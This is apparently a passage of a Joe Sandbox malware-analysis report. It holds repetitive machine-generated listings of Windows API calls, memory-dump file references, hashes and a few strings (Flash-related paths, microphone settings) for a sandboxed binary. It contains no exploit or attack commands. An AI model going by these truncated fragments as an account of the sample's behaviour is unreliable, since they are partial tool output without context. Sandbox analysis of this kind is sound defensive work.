                                                                                                                                                        • Instruction Fuzzy Hash: 76019A752042046FC304DB69ED88C6B7BF8EACD614B000A5DFA8983312E635E806DB71
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,000007D0,?,?,?,004E515B,?,?,00000000,0041D485), ref: 004E468C
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,0041D485), ref: 004E46A2
                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,000007D0,?,?,?,004E515B,?,?,00000000,0041D485), ref: 004E46D0
                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,?,004E515B,?,?,00000000,0041D485), ref: 004E46D9
                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,?,004E515B,?,?,00000000,0041D485), ref: 004E46E6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Delete$EnterLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3104255891-0
                                                                                                                                                        • Opcode ID: 9344d0e21620c09b28f686a70e2872a698c0d1dfac57927c88a57cb864f4338f
                                                                                                                                                        • Instruction ID: c031ed0988ac34fb64eb35ca7992c3622ed3d26c78e5592643255ae209dbdd49
                                                                                                                                                        • Opcode Fuzzy Hash: 9344d0e21620c09b28f686a70e2872a698c0d1dfac57927c88a57cb864f4338f
                                                                                                                                                        • Instruction Fuzzy Hash: D101D4B750060C5BC2106B35EC81BAF73A8AFC4214F05051EF54F93241DA68B8088BA1
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesExA.KERNEL32(?,00000000,?,?,?,00000000,00000008,?,00000008,0041D676,?,?,FlashAuthor.cfg,?,?,00000008), ref: 004CFE0F
                                                                                                                                                          • Part of subcall function 004CB0E0: GetVersionExA.KERNEL32 ref: 004CB0FB
                                                                                                                                                        • GetFileAttributesExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,00000008,?,00000008,0041D676,?,?,FlashAuthor.cfg,?), ref: 004CFDAF
                                                                                                                                                        • GetFileAttributesExA.KERNEL32(00000000,00000000,?,?,00000000,00000008,?,00000008,0041D676,?,?,FlashAuthor.cfg,?,?,00000008,00000000), ref: 004CFDED
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesFile$Version
                                                                                                                                                        • String ID: \\?\
                                                                                                                                                        • API String ID: 3849939888-4282027825
                                                                                                                                                        • Opcode ID: f361000200f27e6454158b11577cb5cd6586d4ef8c56bbe8a0e4f20a4d525da9
                                                                                                                                                        • Instruction ID: f991edffad243b4bd670aca913d189ed867c40d808b57564552852d0b3f79ee3
                                                                                                                                                        • Opcode Fuzzy Hash: f361000200f27e6454158b11577cb5cd6586d4ef8c56bbe8a0e4f20a4d525da9
                                                                                                                                                        • Instruction Fuzzy Hash: 6431277A90031067D710AA65AC42FEB73995F85704F54042FF90687352EB6D9C0EC2EA
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,00000000), ref: 004FA67B
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004FA749
                                                                                                                                                          • Part of subcall function 004F9B30: EnterCriticalSection.KERNEL32(?,00000000,?,004FA7A6,?,?,76ECFFB0), ref: 004F9B35
                                                                                                                                                          • Part of subcall function 004F9B30: LeaveCriticalSection.KERNEL32(?), ref: 004F9B84
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000100,00000000,00000000,?), ref: 004FA715
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                                                                                                                                        • String ID: FriendlyName
                                                                                                                                                        • API String ID: 904232820-3623505368
                                                                                                                                                        • Opcode ID: 959ce2fe4b047605d4d04147b9c19dc8780e3383a8dda147e2258153261544ba
                                                                                                                                                        • Instruction ID: 4f25218f4a75fa1caa45750efdb6ff353ea89136e06b91a5ad3ed6f7a0914714
                                                                                                                                                        • Opcode Fuzzy Hash: 959ce2fe4b047605d4d04147b9c19dc8780e3383a8dda147e2258153261544ba
                                                                                                                                                        • Instruction Fuzzy Hash: 9A212A75244301AFD220EB54DC49F5BB7F8BF88714F008A1DFA899B290D774F8098BA6
                                                                                                                                                        APIs
                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 004CADB4
                                                                                                                                                        • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 004CADC8
                                                                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 004CADD8
                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 004CADFF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Create$CompatibleDeleteObjectSection
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3137390749-0
                                                                                                                                                        • Opcode ID: a74e2540195e9566e7a2ac5dffe2e2de3f45b10f51a9d4c1ea3247f6bedff2c4
                                                                                                                                                        • Instruction ID: ec125f8efd539a004f5243cd975522e641b23088832de904e1665531ca55df12
                                                                                                                                                        • Opcode Fuzzy Hash: a74e2540195e9566e7a2ac5dffe2e2de3f45b10f51a9d4c1ea3247f6bedff2c4
                                                                                                                                                        • Instruction Fuzzy Hash: 2981AFB56043458FC324CF29D484A67FBF1BF98314F148A6ED58A87712D334E989CBA6
                                                                                                                                                        APIs
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32 ref: 0052AFF0
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0052B016
                                                                                                                                                          • Part of subcall function 0040C250: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040C25F
                                                                                                                                                          • Part of subcall function 0040C250: Sleep.KERNEL32(00000000,?,?,0052B390,?,004012F9,00000008), ref: 0040C272
                                                                                                                                                          • Part of subcall function 0040C250: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040C279
                                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 0052B050
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0052B05B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CounterExchangeInterlockedPerformanceQuery$Compare$Sleep
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 188302963-0
                                                                                                                                                        • Opcode ID: c96cf593c803fdbd1df6e800226bb337d538f109cfd51101e6c499ec62b01222
                                                                                                                                                        • Instruction ID: 331ae7ec3883c6fb41667714d1c2397b805b788a0704fbfdebc2abdcd4384ec1
                                                                                                                                                        • Opcode Fuzzy Hash: c96cf593c803fdbd1df6e800226bb337d538f109cfd51101e6c499ec62b01222
                                                                                                                                                        • Instruction Fuzzy Hash: 19212A75604712ABC318DF65D884A9AF7E8BF89300F040A1DE85993780D734F918CBA2
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004E4850: waveInGetNumDevs.WINMM(defaultmicrophone,00000000,?,00000000,?,?,?,?,004E8459,?,?,?,?,?,?,?), ref: 004E489B
                                                                                                                                                          • Part of subcall function 004E4C80: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,004E5C7E,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E4C8A
                                                                                                                                                          • Part of subcall function 004E4C80: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E4CD7
                                                                                                                                                          • Part of subcall function 004E3860: EnterCriticalSection.KERNEL32(?,00000000,?,004E5C91,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E3868
                                                                                                                                                          • Part of subcall function 004E3860: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E388F
                                                                                                                                                          • Part of subcall function 004E5B40: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,004E5C9B,00000000,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?), ref: 004E5B4C
                                                                                                                                                          • Part of subcall function 004E5B40: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E5B71
                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000004,00000000,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E5CA2
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E5CB2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave$Devswave
                                                                                                                                                        • String ID: echosuppression$gain
                                                                                                                                                        • API String ID: 967401230-1829011300
                                                                                                                                                        • Opcode ID: 546b0f3ebceeb7a0da23e6f321f446937bde9f1e62618b4c4d58b1762877edae
                                                                                                                                                        • Instruction ID: eec625d20ecc8ac728587d7ca18c0fda910ff7f544bd80cb39fcd025b5d808b6
                                                                                                                                                        • Opcode Fuzzy Hash: 546b0f3ebceeb7a0da23e6f321f446937bde9f1e62618b4c4d58b1762877edae
                                                                                                                                                        • Instruction Fuzzy Hash: 4C118E35700B449BC711EB67C9A1A2BB3B9BF8871AB15049EE5464B741CB24FC02CBA4
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0050B060: CreateEventA.KERNEL32(00000000,?,00000000,00000000,00000000,00509F02,00000000,00000000,?,0000007C,?,00000004,00000000,00000008,00000000,004F924E), ref: 0050B06E
                                                                                                                                                        • InitializeCriticalSection.KERNEL32(0000007C,00000001,00000001,00000000,00000000,?,0000007C,?,00000004,00000000,00000008,00000000,004F924E,00549D98,?,?), ref: 00509F34
                                                                                                                                                        • InitializeCriticalSection.KERNEL32(00000094,?,?,?,?,?,?,?,?,76ECFFB0), ref: 00509F3D
                                                                                                                                                        • InitializeCriticalSection.KERNEL32 ref: 00509F6E
                                                                                                                                                        • SetEvent.KERNEL32 ref: 00509F74
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalInitializeSection$Event$Create
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 662013055-0
                                                                                                                                                        • Opcode ID: 8b41bb8ea36a2531d5352067329df235b3019d45486671b4f72c125a1e36c2c0
                                                                                                                                                        • Instruction ID: a00b6d7b902e657a52a59b9571d5736a80dfe09fbfe7896e9036a1fe9281f1e6
                                                                                                                                                        • Opcode Fuzzy Hash: 8b41bb8ea36a2531d5352067329df235b3019d45486671b4f72c125a1e36c2c0
                                                                                                                                                        • Instruction Fuzzy Hash: 9B21C4B1540B049FE320DF6AD884A9BFBE8FF94704F00490EE1AA83661D7B1B405CB61
                                                                                                                                                        APIs
                                                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000105), ref: 004D2AB9
                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 004D2B3D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CompatibleCreateDirectorySystem
                                                                                                                                                        • String ID: Macromed\Flash\
                                                                                                                                                        • API String ID: 2606042488-1438515271
                                                                                                                                                        • Opcode ID: f3a03fc43bac1eceec5fa71542f71d31eecc73db7bcc940814b63f05b2770dec
                                                                                                                                                        • Instruction ID: 299e9cb63676f09c6c690dce7675c16131e739682a5e940449f79e26451de6f9
                                                                                                                                                        • Opcode Fuzzy Hash: f3a03fc43bac1eceec5fa71542f71d31eecc73db7bcc940814b63f05b2770dec
                                                                                                                                                        • Instruction Fuzzy Hash: 8F118A711047016FC704EF21EC52AAF77E4BF98704F40491EF19943281DB78A908CFAA
                                                                                                                                                        APIs
